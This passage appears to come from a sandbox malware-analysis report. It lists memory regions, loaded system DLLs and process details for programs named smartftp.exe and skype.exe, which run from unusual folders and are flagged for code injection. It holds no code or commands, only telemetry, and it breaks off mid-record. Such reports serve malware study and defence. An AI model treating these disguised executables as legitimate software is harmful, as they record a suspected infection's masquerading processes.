region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1926 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1927 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1928 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1929 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1930 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1931 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1932 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1933 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1934 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1935 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 1936 start_va = 0xb40000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 1937 start_va = 0xb50000 end_va = 0xc0bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 1938 start_va = 0xd90000 end_va = 0xda6fff monitored = 0 entry_point = 0xd914a1 region_type = mapped_file name = "thunderbird.exe" filename = "\\Program Files\\Windows Journal\\thunderbird.exe" (normalized: "c:\\program files\\windows journal\\thunderbird.exe") Region: id = 1939 start_va = 0xdb0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 1940 start_va = 0x21b0000 end_va = 0x2b73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 1941 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1942 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1943 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1944 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1945 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1946 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1947 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1948 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1949 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1950 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1951 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1952 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1953 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1954 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1955 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1956 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1957 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1958 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1959 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1960 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1961 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1962 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1963 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1964 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1965 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1966 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 1968 start_va = 0x2b80000 end_va = 0x2d0cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Thread: id = 114 os_tid = 0x1128 Process: id = "16" image_name = "smartftp.exe" filename = "c:\\program files\\windows multimedia platform\\smartftp.exe" page_root = "0x7af8a000" os_pid = "0x112c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Multimedia Platform\\smartftp.exe\" " cur_dir = "C:\\Program Files\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1969 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1970 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1971 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1972 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1973 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1974 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1975 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1976 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1977 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1978 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1979 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1980 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1981 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1982 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1983 start_va = 0x570000 end_va = 0x62dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1984 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1985 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1986 start_va = 0xad0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 1987 start_va = 0xae0000 end_va = 0xb9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 1988 start_va = 0xbc0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 1989 start_va = 0x13e0000 end_va = 0x13f6fff monitored = 0 entry_point = 0x13e14a1 region_type = mapped_file name = "smartftp.exe" filename = "\\Program Files\\Windows Multimedia Platform\\smartftp.exe" (normalized: "c:\\program files\\windows multimedia platform\\smartftp.exe") Region: id = 1990 start_va = 0x1400000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001400000" filename = "" Region: id = 1991 start_va = 0x2800000 end_va = 0x31c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 1992 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1993 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1994 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1995 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1996 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1997 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1998 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1999 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2000 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2001 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2002 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2003 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2004 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2005 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2006 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2007 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2008 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2009 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2010 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2011 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2012 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2013 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2014 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2015 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2016 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2017 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2020 start_va = 0x630000 end_va = 0x727fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Thread: id = 115 os_tid = 0x1130 Process: id = "17" image_name = "skype.exe" filename = "c:\\program files\\msbuild\\skype.exe" page_root = "0x5fcaa000" os_pid = "0x113c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\MSBuild\\skype.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2021 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2022 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2023 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2024 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2025 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2026 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2027 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2028 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2029 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2030 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2031 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2032 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2033 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2034 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2035 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2036 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2037 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2038 start_va = 0xaf0000 end_va = 0xbabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 2039 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 2040 start_va = 0xcc0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 2041 start_va = 0x1270000 end_va = 0x1286fff monitored = 0 entry_point = 0x12714a1 region_type = mapped_file name = "skype.exe" filename = "\\Program Files\\MSBuild\\skype.exe" (normalized: "c:\\program files\\msbuild\\skype.exe") Region: id = 2042 start_va = 0x1290000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 2043 start_va = 0x2690000 end_va = 0x3053fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 2044 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2045 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2046 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2047 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2048 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2049 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2050 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2051 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2052 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2053 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2054 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2055 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2056 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2057 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2058 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2059 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2060 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2061 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2062 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2063 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2064 start_va = 0x7feb0000 end_va = 